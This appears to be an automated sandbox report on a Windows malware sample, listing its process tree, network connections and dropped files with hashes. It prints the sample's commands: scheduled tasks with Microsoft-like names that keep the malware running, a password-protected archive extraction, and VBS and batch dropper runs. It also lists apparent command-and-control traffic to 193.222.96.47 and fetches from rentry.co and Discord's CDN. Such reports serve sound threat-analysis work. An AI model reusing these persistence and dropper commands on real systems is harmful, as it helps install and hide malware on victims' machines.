C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\ComSvcConfig.exe

C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\MicrosoftCertificateServices.exe

C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\MicrosoftCertificateServices.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cscript "C:\Users\Public\Pictures\b.vbs""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn BfeOnServiceStartTypeChange /tr "C:\ProgramData\MicrosoftTool\current\Microsoft.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /f"

C:\Windows\system32\schtasks.exe

schtasks /create /tn BfeOnServiceStartTypeChange /tr "C:\ProgramData\MicrosoftTool\current\Microsoft.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /f

C:\ProgramData\MicrosoftTool\current\Microsoft.exe

"C:\ProgramData\MicrosoftTool\current\Microsoft.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Teams" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1844 --field-trial-handle=2028,i,18157234341469404302,13787379743655801583,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\system32\cscript.exe

cscript "C:\Users\Public\Pictures\b.vbs"

C:\ProgramData\MicrosoftTool\current\Microsoft.exe

"C:\ProgramData\MicrosoftTool\current\Microsoft.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\Teams" --mojo-platform-channel-handle=2216 --field-trial-handle=2028,i,18157234341469404302,13787379743655801583,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Pictures\b.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\Temp\7zr.exe" x "C:\Users\Admin\AppData\Local\Temp\alwu2g.7z" -o"C:\Users\Admin\AppData\Local\Temp\alwu2g" -p7KoLumBiyaDTX001!!"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Users\Admin\AppData\Local\Temp\7zr.exe

"C:\Users\Admin\AppData\Local\Temp\7zr.exe" x "C:\Users\Admin\AppData\Local\Temp\alwu2g.7z" -o"C:\Users\Admin\AppData\Local\Temp\alwu2g" -p7KoLumBiyaDTX001!!

C:\Users\Public\Pictures\Service.exe

C:\Users\Public\Pictures\Service.exe

C:\Windows\SYSTEM32\cmd.exe

cmd /c v2.bat

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\aitstatic.exe'""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "MsCftMonitor" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\aitstatic.exe" /st 00:00 /du 9999:59 /sc once /ri 10 /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "DobeDiscovery" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\ComSvcConfig.exe" /st 00:00 /du 9999:59 /sc once /ri 10 /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "Microsoft Certificate Services" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\MicrosoftCertificateServices.exe" /st 00:00 /du 9999:59 /sc once /ri 10 /f"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\aitstatic.exe'"

C:\Windows\system32\schtasks.exe

schtasks /Create /SC MINUTE /MO 60 /TN "\Microsoft\Windows\Windows Activation UEFI\BfeOnServiceStartTypeChange" /TR "C:\ProgramData\MicrosoftTool\current\Microsoft.exe" /ST 00:00 /DU 9999:59 /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /create /tn "MsCftMonitor" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\aitstatic.exe" /st 00:00 /du 9999:59 /sc once /ri 10 /f

C:\Windows\system32\schtasks.exe

schtasks /create /tn "Microsoft Certificate Services" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\MicrosoftCertificateServices.exe" /st 00:00 /du 9999:59 /sc once /ri 10 /f

C:\Windows\system32\schtasks.exe

schtasks /create /tn "DobeDiscovery" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\ComSvcConfig.exe" /st 00:00 /du 9999:59 /sc once /ri 10 /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 ipinfo.io udp
US 204.79.197.200:443 g.bing.com tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 8.8.8.8:53 rentry.co udp
US 104.21.95.148:443 rentry.co tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 www.7-zip.org udp
DE 49.12.202.237:443 www.7-zip.org tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 148.95.21.104.in-addr.arpa udp
US 8.8.8.8:53 237.202.12.49.in-addr.arpa udp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
DE 49.12.202.237:443 www.7-zip.org tcp
US 104.21.95.148:443 rentry.co tcp
US 8.8.8.8:53 cdn.gilcdn.com udp
ES 18.172.226.107:443 cdn.gilcdn.com tcp
US 8.8.8.8:53 107.226.172.18.in-addr.arpa udp
NL 193.222.96.47:9471 tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
NL 193.222.96.47:4462 tcp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
NL 193.222.96.47:4462 tcp
NL 193.222.96.47:9471 tcp
DE 49.12.202.237:443 www.7-zip.org tcp
NL 193.222.96.47:9471 tcp
NL 193.222.96.47:4462 tcp
US 8.8.8.8:53 www.google.com udp
IE 74.125.193.147:443 www.google.com tcp
IE 74.125.193.147:443 www.google.com tcp
US 8.8.8.8:53 147.193.125.74.in-addr.arpa udp
IE 74.125.193.147:443 www.google.com tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google tcp
IE 74.125.193.147:443 www.google.com tcp
IE 74.125.193.147:443 www.google.com tcp
IE 74.125.193.147:443 www.google.com tcp
IE 74.125.193.147:443 www.google.com tcp
IE 74.125.193.147:443 www.google.com tcp
IE 74.125.193.147:443 www.google.com tcp
IE 74.125.193.147:443 www.google.com tcp
NL 193.222.96.47:4462 tcp
NL 193.222.96.47:9471 tcp
IE 74.125.193.147:443 www.google.com tcp
IE 74.125.193.147:443 www.google.com tcp
IE 74.125.193.147:443 www.google.com tcp
IE 74.125.193.147:443 www.google.com tcp
IE 74.125.193.147:443 www.google.com tcp
US 104.21.95.148:443 rentry.co tcp
US 8.8.8.8:53 www.7-zip.org udp
DE 49.12.202.237:443 www.7-zip.org tcp
IE 74.125.193.147:443 www.google.com tcp
US 104.21.95.148:443 rentry.co tcp
US 8.8.8.8:53 cdn.gilcdn.com udp
ES 18.172.226.9:443 cdn.gilcdn.com tcp
US 8.8.8.8:53 13.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 9.226.172.18.in-addr.arpa udp

Files

memory/1784-0-0x0000000000820000-0x000000000087A000-memory.dmp

memory/1784-1-0x0000000074400000-0x0000000074BB0000-memory.dmp

memory/1784-2-0x00000000051E0000-0x00000000051F0000-memory.dmp

memory/1784-3-0x00000000051F0000-0x00000000052A2000-memory.dmp

memory/1784-4-0x0000000005320000-0x0000000005396000-memory.dmp

memory/1784-5-0x0000000006530000-0x0000000006552000-memory.dmp

memory/1784-6-0x0000000006680000-0x000000000669E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\qjut2lwwde.sln

MD5 6e72bddb81725746dc41b2d71dac713d
SHA1 9d471f3da4490332535988bd9a9dbe8cf500b1ba
SHA256 20e342407f9e61a6d8d781503fa45e7a37e83c1bbb27d32d6d02918a17ea251f
SHA512 8506d485393b3d4297e0fbe3cdd0b8d35f49f95646d83085c081b969ccae458bac619903d4bf1b55b8cadabe300113b1d909abb4399af0cd0e77b95ee2a76956

C:\Users\Admin\AppData\Local\Temp\7zr.exe

MD5 58fc6de6c4e5d2fda63565d54feb9e75
SHA1 0586248c327d21efb8787e8ea9f553ddc03493ec
SHA256 72c98287b2e8f85ea7bb87834b6ce1ce7ce7f41a8c97a81b307d4d4bf900922b
SHA512 e7373a9caa023a22cc1f0f4369c2089a939ae40d26999ab5dcab2c5feb427dc9f51f96d91ef078e843301baa5d9335161a2cf015e09e678d56e615d01c8196df

C:\Users\Admin\AppData\Local\Temp\1r1zh13mzo.7z

MD5 f51ea27d1e6f3cc494110a5cf630d0e7
SHA1 f7ff77d519356ca1db913d65ff02befda8a417d2
SHA256 63889a2a9c8fa9d3343273a2812fe09b2e922469cffc668930275758d4677a30
SHA512 9a3869bc076909f9495a8d70754f97ec27c026901e53d80b24ca91db3cc78acdfcd9703f58ca774edf415b1daab27b7bc6471ecf58f0e50d4574c7bf3d13d280

C:\Users\Admin\AppData\Local\Temp\V7a682c45-aab4-433b-9c0b-0bfbe6001744\VisualStudio.exe

MD5 5602ece271f4968d46c5e8be45eb8341
SHA1 1e7f2f1c6c08897965218fc2eb1707364601fbfb
SHA256 ced23104253e55e011dd15862eec275352406b0541672bb9bdace10af2bf6a52
SHA512 c11a35bc1abe62b171b3a9421c7d017a70f2f95335066dd8dbabf1bd5c2dab3d4ea4396a2f417b2b2bf3f3d6ac6d29ca6e80369346060ee0c6644a95167ca324

memory/1784-22-0x0000000074400000-0x0000000074BB0000-memory.dmp

memory/4184-23-0x0000000074400000-0x0000000074BB0000-memory.dmp

memory/4184-21-0x0000000000410000-0x000000000050E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zr.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/4184-27-0x0000000004D80000-0x0000000004D90000-memory.dmp

C:\Users\Public\Videos\b.vbs

MD5 4def58f71185d258e72f6d7fabcbe5e2
SHA1 3cf7aefe4419333e19c9cf35845f3ba6fa5334a7
SHA256 98cb3d001dbb0bddf97bba87a645cbea8e8fac569e0fa01c2b68530b9c6412cd
SHA512 fa83a22acb11144ae348be5bf6526daee99f1cd7396198be33ad08f57042da560b566bee3d964ff01130a15850d6904fe42062971d40b5b92af47913c8c5f5ef

C:\Users\Public\Videos\b.bat

MD5 874525c405f65daa259081784a3458f1
SHA1 dfd8f40593c680381f7be52c5765184673412b9e
SHA256 98679e199f231aa012b301bc3b2a678b1ff52a87bc1c59c546183b9f53bc65ed
SHA512 272f4378fe22795896e15f3b009a594873f56e4e08144c5d72b92944ed8044b41b2b68881af9c4809086340a3b36a4ada8c708220368fd89c256d0d9028c993c

C:\Users\Public\Videos\Service.exe

MD5 8e4bd18fec7dc15624f8e5a92b9fd984
SHA1 ef36e236e4d9c92385bfd73f20389cba234760c6
SHA256 8d1a65e6518734cf14f0b301faeb013691e1992596bf190093443c7e01014ddd
SHA512 99442c65067941197fed3b4eb0f6f72b86b440f7de5ab29b0914d467fa25f8c61e8b47f20ade0850e722f67688fb677e316caa35fac75e0175d70d1d5d37f3fd

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\babel.bat

MD5 ee59ad824ab63da2f08c4db2f809a146
SHA1 c0badf069b83e9a3f0708224bbd7c87d303bd8d0
SHA256 f79ea324982a5e2ec73a3a6a7acd13cbfbd83bf28267ee4fec5098e332450730
SHA512 ad19559e390313ff9247aaf5de23ae1160c5c06ac37172f16c69abe3d1d96cd253d359ea9f1ec77e2cccc1378ffa5c83d597065b8fb8f4dc3f889f94643ea395

memory/3476-37-0x00007FF99A340000-0x00007FF99AE01000-memory.dmp

memory/3476-38-0x0000025BD2980000-0x0000025BD2990000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q205xvds.byg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3476-39-0x0000025BD2930000-0x0000025BD2952000-memory.dmp

memory/3476-51-0x00007FF99A340000-0x00007FF99AE01000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\884a6dca-87b0-4865-b23e-f822bb58cdaa.7z

MD5 b409be6c2d7d8c618142b536b1bc886f
SHA1 ffd36bdf27138efbd28ce2242ee018e5bc6d747c
SHA256 49687a4ca71f39c0b5579a6932ea00cc2e6740e36d0e06468754377c244e4d38
SHA512 0704549b5a09e59b138b85fab9d05534f41595bb6d1f3ba41e7d07d660a8d10c9f127b09e314f4df5b209635d70469f79abbecead7ff0280a43700f43275f594

C:\Users\Admin\AppData\Local\Temp\V884a6dca-87b0-4865-b23e-f822bb58cdaa\aitstatic.exe

MD5 1407f693dea8fac5eac118996c2e843d
SHA1 462c1954921a3b6168a51871c28c89a5037e94c2
SHA256 db905c360998fe921bae3b6f504d1a5531843c316327aa531b053a5fe3c15078
SHA512 710c8c3a322ea79d7ff0e27a1476e72a544c12b5926607a1254b8f3c23b002052465dc0d62694f6b3e9996dce0e04a99ec9587ba9259d6b5de7bb006a957af05

C:\Users\Admin\AppData\Local\Temp\V884a6dca-87b0-4865-b23e-f822bb58cdaa\WinSAT.exe

MD5 1a3f3608c480357b0b94ce023d565c4b
SHA1 4a11ef37c2ffb4bf3541602e0b4a610ff3141319
SHA256 bb8a4b0238017408c96258dc236f87f9cdb7368879a166b6e0069482bccae5e5
SHA512 2ab52ff94a8847a4a1b821af3dd2b5da3634e452d7c35ae454fd222e49e8adb79358c718aefe9676336280cf393d3b4387a98a5b21564164d9a5b373cc6ae0e7

C:\Users\Admin\AppData\Local\Temp\V884a6dca-87b0-4865-b23e-f822bb58cdaa\MicrosoftCertificateServices.exe

MD5 f904b3a81ec45ef534b3f71917d06799
SHA1 f2b10bf6d24e8c2e23d902735221157de91d289c
SHA256 87191c1f8f9bb849dc99aced5147235b5328860b5ca9283e22aa8fa9f27cb94a
SHA512 534d1d437327d29efb03f286689a23510118bc8f6792e34ebcf77f18a912828ba4bb68c4e122c37f29c9e233fdd005a1d1085eb02c252c8b64742db71208f01e

C:\Users\Admin\AppData\Local\Temp\V884a6dca-87b0-4865-b23e-f822bb58cdaa\ComSvcConfig.exe

MD5 5ae0d1bd1da29c8e5cee19aaa51e19bd
SHA1 021dfa662e44e5e718ea2b17da2b3c73a756bbe3
SHA256 cb14bbbbcf23c8ec8d57f97907163efb77aa547b9298b4aa867ed3322cc2a1c8
SHA512 07b60449e118024917daa0c7a6daef7c3df3e0064c52eaf9bc346ef55762486f44a5c9a7b62b1f0bfc67ea9f6e75089e30ea65261013707675bbd98b93010fe0

memory/4392-83-0x0000000000040000-0x000000000005A000-memory.dmp

memory/4392-84-0x0000000074400000-0x0000000074BB0000-memory.dmp

memory/4392-85-0x0000000004920000-0x0000000004930000-memory.dmp

memory/3128-86-0x0000000000400000-0x0000000000412000-memory.dmp

memory/4392-88-0x0000000074400000-0x0000000074BB0000-memory.dmp

memory/3128-89-0x0000000074400000-0x0000000074BB0000-memory.dmp

memory/3128-90-0x0000000004CE0000-0x0000000004CF0000-memory.dmp

memory/4184-102-0x0000000074400000-0x0000000074BB0000-memory.dmp

memory/2516-101-0x00000000006B0000-0x00000000006CA000-memory.dmp

memory/1100-103-0x0000000000400000-0x0000000000412000-memory.dmp

memory/2516-104-0x0000000074400000-0x0000000074BB0000-memory.dmp

memory/2516-107-0x0000000074400000-0x0000000074BB0000-memory.dmp

memory/2516-106-0x0000000004EE0000-0x0000000004EF0000-memory.dmp

memory/1100-109-0x0000000074400000-0x0000000074BB0000-memory.dmp

memory/4184-108-0x0000000004D80000-0x0000000004D90000-memory.dmp

memory/3476-110-0x0000025BD2980000-0x0000025BD2990000-memory.dmp

memory/1100-111-0x00000000057C0000-0x00000000057D0000-memory.dmp

memory/736-122-0x00000000003C0000-0x00000000003D2000-memory.dmp

memory/736-123-0x0000000074400000-0x0000000074BB0000-memory.dmp

memory/736-124-0x0000000004CD0000-0x0000000004CE0000-memory.dmp

memory/4548-125-0x0000000000400000-0x000000000040A000-memory.dmp

memory/736-127-0x0000000074400000-0x0000000074BB0000-memory.dmp

memory/4548-128-0x0000000074400000-0x0000000074BB0000-memory.dmp

memory/4548-129-0x0000000005BB0000-0x0000000006154000-memory.dmp

memory/4548-131-0x0000000005AD0000-0x0000000005B62000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\WinSAT.exe

MD5 5eb5ee30ebd7c4430447049f810311f2
SHA1 7c70c312cb73851bed30ad5c63dd45eebae3ac58
SHA256 a47cc7b56ebf4efd71513faaddfa184b8df56aef99ee83078b9a316559ac0d2c
SHA512 bc834664faed8101a7bd7a123325444831695e78d7f4c42424bb64a101724879131b37598a6efd53a66bea4e25cae97b03f094ef49ce7a91ef55c14a6f1e15cd

C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\WinSAT.exe

MD5 9c2c23508ed7ffb31dca1cb45ef544e5
SHA1 bd29152eed9a6e2b7184fe43fb1095b53919d1ee
SHA256 65b09040fffadff86bbc9cb5bf767cff082ad0996210aa513aa57249a6096cdb
SHA512 ae33fdb9bd9d5555582f1702a42626881a9e6aec4764dd42fec0be736bc7ede33bab8271aaeee64f754939750e74a27c0c8c1affdef1ea696cf91e86c80f2aae

C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\WinSAT.exe

MD5 8d8af39dbb878e7382ca2608ae47f48e
SHA1 78897c0c7fb43668795cfb6835feacc1c46ba67e
SHA256 3f86d0d933956a4aeeba3e233ff591ce1da3e3bb87b031048fbfac457fadaba2
SHA512 67a7e2d2d8de2eb5c76296fef49d1925bae3a6085353513e3033f22dcca9ab9ec05e8d3777c00e0d4737568bc662701c110cd611bc4c7def833eed2c575476a0

C:\Users\Admin\AppData\Local\Temp\nsm3053.tmp\System.dll

MD5 0d7ad4f45dc6f5aa87f606d0331c6901
SHA1 48df0911f0484cbe2a8cdd5362140b63c41ee457
SHA256 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
SHA512 c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

C:\Users\Admin\AppData\Local\Temp\nsm3053.tmp\nsis7z.dll

MD5 80e44ce4895304c6a3a831310fbf8cd0
SHA1 36bd49ae21c460be5753a904b4501f1abca53508
SHA256 b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592
SHA512 c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

memory/3128-281-0x0000000074400000-0x0000000074BB0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\chrome_100_percent.pak

MD5 acd0fa0a90b43cd1c87a55a991b4fac3
SHA1 17b84e8d24da12501105b87452f86bfa5f9b1b3c
SHA256 ccbca246b9a93fa8d4f01a01345e7537511c590e4a8efd5777b1596d10923b4b
SHA512 3e4c4f31c6c7950d5b886f6a8768077331a8f880d70b905cf7f35f74be204c63200ff4a88fa236abccc72ec0fc102c14f50dd277a30f814f35adfe5a7ae3b774

C:\Users\Admin\AppData\Local\Temp\nsm3053.tmp\7z-out\chrome_200_percent.pak

MD5 4610337e3332b7e65b73a6ea738b47df
SHA1 8d824c9cf0a84ab902e8069a4de9bf6c1a9aaf3b
SHA256 c91abf556e55c29d1ea9f560bb17cc3489cb67a5d0c7a22b58485f5f2fbcf25c
SHA512 039b50284d28dcd447e0a486a099fa99914d29b543093cccda77bbefdd61f7b7f05bb84b2708ae128c5f2d0c0ab19046d08796d1b5a1cff395a0689ab25ccb51

C:\Users\Admin\AppData\Local\Temp\nsm3053.tmp\7z-out\libGLESv2.dll

MD5 0b6b6de96db787f554bc8a1f94707e7d
SHA1 30ba9eedf1f986478c24aa53722c07452643a275
SHA256 13243ea615adbe6530f079eb5525607b9cd89e0729189b5dd3c7129202fb3693
SHA512 e3c261dd3b0dc808f400ca2f774021ef27bdf68d17b37d0ae5330935dceb98a4c950e9d54fa7d6b44e2009e18fc263a6ea723f3f13cba54a17d681ec5af54517

C:\Users\Admin\AppData\Local\Temp\nsm3053.tmp\7z-out\libEGL.dll

MD5 e0a5d1a5d55dffb55513acb736cef1c1
SHA1 307fc023790af5bf3d45678de985e8e9f34896f7
SHA256 aa5da4005c76cfe5195b69282b2ad249d7dc2300bbc979592bd67315fc30c669
SHA512 094e23869fd42c60f83e0f4d1a2cd1a29d2efd805ac02a01ce9700b8e7b0e39e52fe86503264a0298c85f0d02b38620f1e773f2ea981f3049aeba3104b04253f

C:\Users\Admin\AppData\Local\Temp\nsm3053.tmp\7z-out\LICENSES.chromium.html

MD5 b7093229c875518ec5f010a27305c648
SHA1 c3a5229a9f2469ea4efbeb1f075e40af9a3681fb
SHA256 87f38aeef0f49e06ff9506edded5f10000f8099255fd8e9e4fa3f16fe3f5655e
SHA512 510b309c1cbb9a65d1b42ca4abce940e94f2fac2f0aa98436f19b2179fcffb3e6572f0ee0632e7152c1e47dc8f446ac4e01d9b82bc79afb0e9cfb059c1c0670a

C:\Users\Admin\AppData\Local\Temp\nsm3053.tmp\7z-out\LICENSE.electron.txt

MD5 4d42118d35941e0f664dddbd83f633c5
SHA1 2b21ec5f20fe961d15f2b58efb1368e66d202e5c
SHA256 5154e165bd6c2cc0cfbcd8916498c7abab0497923bafcd5cb07673fe8480087d
SHA512 3ffbba2e4cd689f362378f6b0f6060571f57e228d3755bdd308283be6cbbef8c2e84beb5fcf73e0c3c81cd944d01ee3fcf141733c4d8b3b0162e543e0b9f3e63

C:\Users\Admin\AppData\Local\Temp\nsm3053.tmp\7z-out\icudtl.dat

MD5 29a42c445b03bc03a25d1468ac9e5593
SHA1 877de7047bdc4815136e83c38ce06850d0d57500
SHA256 0132f9fa8d3ca17bba9ab30b4910110d7ce473fd118b0b133622ecc4f15bf034
SHA512 e20e7d522c785699f40494ec27f0f78b5a5b5d88e7e17419e782d0c7b0f75c68b94dacd54f8e3714a200c8c7ab8597390e2d29d67ebcac3b3aed4b153e198324

C:\Users\Admin\AppData\Local\Temp\nsm3053.tmp\7z-out\ffmpeg.dll

MD5 0ca3cdd83b406f5fb6405fcd29e91394
SHA1 449f980a3ffa523ce802b803bb7f3bae49dd1cee
SHA256 ffe1a083b68ca5d0c87993d36c34686744b7c2008e1359629ea4a82e3a33e5d1
SHA512 f8eac22bf03f6069fe8f8b963e0bb7b7677392e50cdb1616685bb962c62dda398ddff74c9e9f9f8b0041f585605a79edce6410951ff37401113fa01d4105e0a2

C:\Users\Admin\AppData\Local\Temp\nsm3053.tmp\7z-out\d3dcompiler_47.dll

MD5 9c9929ff9842afde17dc3d98801c8b66
SHA1 443e0026edd4b6803e9055e37efe5701923237eb
SHA256 ea05e95ee5bdcd3a97687c3afcb0c21fab0a2df19f94d023a84b4e41dfe075f1
SHA512 bcece0f7a03d1102d8eb789ff5910fe86196619d5fcefb411cbec2e87a53a9cefbc76a497fb3742e6cabebfec15eb31167993fcfffc0ee87b462a35b49d4e996

C:\Users\Admin\AppData\Local\Temp\nsm3053.tmp\7z-out\resources.pak

MD5 7d5065ecba284ed704040fca1c821922
SHA1 095fcc890154a52ad1998b4b1e318f99b3e5d6b8
SHA256 a10c3d236246e001cb9d434a65fc3e8aa7acddddd9608008db5c5c73dee0ba1f
SHA512 521b2266e3257adaa775014f77b0d512ff91b087c2572359d68ffe633b57a423227e3d5af8ee4494538f1d09aa45ffa1fe8e979814178512c37f7088ddd7995d

C:\Users\Admin\AppData\Local\Temp\nsm3053.tmp\7z-out\Runtime Broker.exe

MD5 ed7abe67e4d5f8b5aed528d346a250ed
SHA1 10796335d5a1c4231d17b04a65c662dbc785fdec
SHA256 93389d57547eeb591ae20856f1afd5c4ef87dd808f2d81466d6094f08e386426
SHA512 87a7459c4c4f2b6b4564a6d988e56d0cbf92a54b8d3c7eeb724b39c9f57eb381e779018732bf1042ee6fe198dd950b7ee582471fdb44231e6f95f6a8e272aeb6

C:\Users\Admin\AppData\Local\Temp\nsm3053.tmp\7z-out\snapshot_blob.bin

MD5 916127734bc7c5b0db478191a37fc19a
SHA1 f9d868c2578f14513fcb95e109aec795c98dbba3
SHA256 e19ed7fb96e19bb5bfe791df03561d654ea5d52021c3403a2652f439a8d77801
SHA512 d291b26568572d5777b036577ddf30c1b6c6c41e9d53ef2d8af735db001ea5c568371f3907fbffc02feee628f0f29afb718ae5deb32ff245a37947a7b1b9c297

C:\Users\Admin\AppData\Local\Temp\nsm3053.tmp\7z-out\v8_context_snapshot.bin

MD5 4f4d00247758c684c295243ddedd2948
SHA1 f8e8fc6c22fde9df1d60c329e38b38a85f96bb69
SHA256 4ea84c4465eea20b46e6ded30f711f1e0d61e15574d861b0210819abd5e895e5
SHA512 2c335672979114bd68ff6f1b1b94235fbf072fe8642cad1f7d61855b92741f0633fa0ccb77cd520be560db2d3ac75f9be08e22806487bf5d3045781e3903ad45

C:\Users\Admin\AppData\Local\Temp\nsm3053.tmp\7z-out\vk_swiftshader.dll

MD5 ab94296e778a9b94ac6d6c3fd9470b74
SHA1 84814af7a248b677484e6c2b34fffbcc7b84d9f0
SHA256 cfc8fba0c8773aeb35babf7e561ffe3202bb72be3a64ee1b8bfcf58e0d0d93d5
SHA512 ac3768f159297562c4791b483645cb0c105d7525fffe43957a6af2a2bd28450a00025a5d1a854efc36b9d047cbc9e903b0806c476001e99d804df98eb879f92a

C:\Users\Admin\AppData\Local\Temp\nsm3053.tmp\7z-out\vk_swiftshader_icd.json

MD5 8642dd3a87e2de6e991fae08458e302b
SHA1 9c06735c31cec00600fd763a92f8112d085bd12a
SHA256 32d83ff113fef532a9f97e0d2831f8656628ab1c99e9060f0332b1532839afd9
SHA512 f5d37d1b45b006161e4cefeebba1e33af879a3a51d16ee3ff8c3968c0c36bbafae379bf9124c13310b77774c9cbb4fa53114e83f5b48b5314132736e5bb4496f

C:\Users\Admin\AppData\Local\Temp\nsm3053.tmp\7z-out\vulkan-1.dll

MD5 a947c5d8fec95a0f24b4143ced301209
SHA1 ebf3089985377a58b8431a14e22a814857287aaf
SHA256 29cb256921a1b0f222c82650469d534ccdf038d1f395b3aaa9f1086918f5d3fa
SHA512 75f5e055f4422b5558fc1cb3ea84fb7cbeaae6f71c786cc06c295d4ab51c0b1c84e28a7c89fe544f007dbe8e612bed4059139f1575934fe4bac8e538c674ebd3

C:\Users\Admin\AppData\Local\Temp\nsm3053.tmp\7z-out\locales\ar.pak

MD5 47a6d10b4112509852d4794229c0a03b
SHA1 2fb49a0b07fbdf8d4ce51a7b5a7f711f47a34951
SHA256 857fe3ab766b60a8d82b7b6043137e3a7d9f5cfb8ddd942316452838c67d0495
SHA512 5f5b280261195b8894efae9df2bece41c6c6a72199d65ba633c30d50a579f95fa04916a30db77831f517b22449196d364d6f70d10d6c5b435814184b3bcf1667

C:\Users\Admin\AppData\Local\Temp\nsm3053.tmp\7z-out\locales\bn.pak

MD5 5cdd07fa357c846771058c2db67eb13b
SHA1 deb87fc5c13da03be86f67526c44f144cc65f6f6
SHA256 01c830b0007b8ce6aca46e26d812947c3df818927b826f7d8c5ffd0008a32384
